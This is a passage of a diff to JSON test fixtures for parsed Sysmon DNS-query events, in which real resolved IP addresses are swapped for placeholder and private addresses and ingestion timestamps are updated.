Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:11.066Z", @@ -20245,11 +19976,11 @@ "type": "CNAME" }, { - "data": "31.13.71.36", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -20257,7 +19988,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -20265,7 +19996,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -20273,7 +20004,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -20281,21 +20012,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "31.13.71.36", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -20311,22 +20042,22 @@ "www.facebook.com" ], "ip": [ - "31.13.71.36", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313984372Z", + "ingested": "2021-12-09T13:49:44.740067300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:31.13.71.36;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:17.272Z", @@ -20406,12 +20137,12 @@ "type": "CNAME" }, { - "data": "192.229.163.25", + "data": "192.168.163.25", "type": "A" } ], "resolved_ip": [ - "192.229.163.25" + "192.168.163.25" ] }, "network": { @@ -20431,13 +20162,13 @@ "platform.twitter.com" ], "ip": [ - "192.229.163.25" + "192.168.163.25" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313985639Z", + "ingested": "2021-12-09T13:49:44.740073100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.229.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.168.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:17.272Z", @@ -20497,23 +20228,23 @@ }, "answers": [ { - "data": "104.244.42.8", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.244.42.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.244.42.136", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.244.42.72", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -20521,7 +20252,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -20529,7 +20260,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -20537,7 +20268,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -20546,17 +20277,17 @@ } ], "resolved_ip": [ - "104.244.42.8", - "104.244.42.200", - "104.244.42.136", - "104.244.42.72", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, @@ -20572,24 +20303,21 @@ "syndication.twitter.com" ], "ip": [ - "104.244.42.8", - "104.244.42.200", - "104.244.42.136", - "104.244.42.72", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313986894Z", + "ingested": "2021-12-09T13:49:44.740079100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.244.42.8;::ffff:104.244.42.200;::ffff:104.244.42.136;::ffff:104.244.42.72;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:17.272Z", @@ -20653,12 +20381,12 @@ "type": "CNAME" }, { - "data": "172.217.10.34", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "network": { @@ -20674,13 +20402,13 @@ "ade.googlesyndication.com" ], "ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313988192Z", + "ingested": "2021-12-09T13:49:44.740085Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:21.552Z", @@ -20748,12 +20476,12 @@ "type": "CNAME" }, { - "data": "72.21.81.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.81.200" + "89.160.20.156" ] }, "network": { @@ -20770,13 +20498,13 @@ "iecvlist.microsoft.com" ], "ip": [ - "72.21.81.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313989505Z", + "ingested": "2021-12-09T13:49:44.740091Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:33.148Z", @@ -20840,12 +20568,12 @@ "type": "CNAME" }, { - "data": "40.77.232.95", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "40.77.232.95" + "89.160.20.156" ] }, "network": { @@ -20861,13 +20589,13 @@ "tsfe.trafficshaping.dsp.mp.microsoft.com" ], "ip": [ - "40.77.232.95" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313990763Z", + "ingested": "2021-12-09T13:49:44.740095Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:40.77.232.95;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 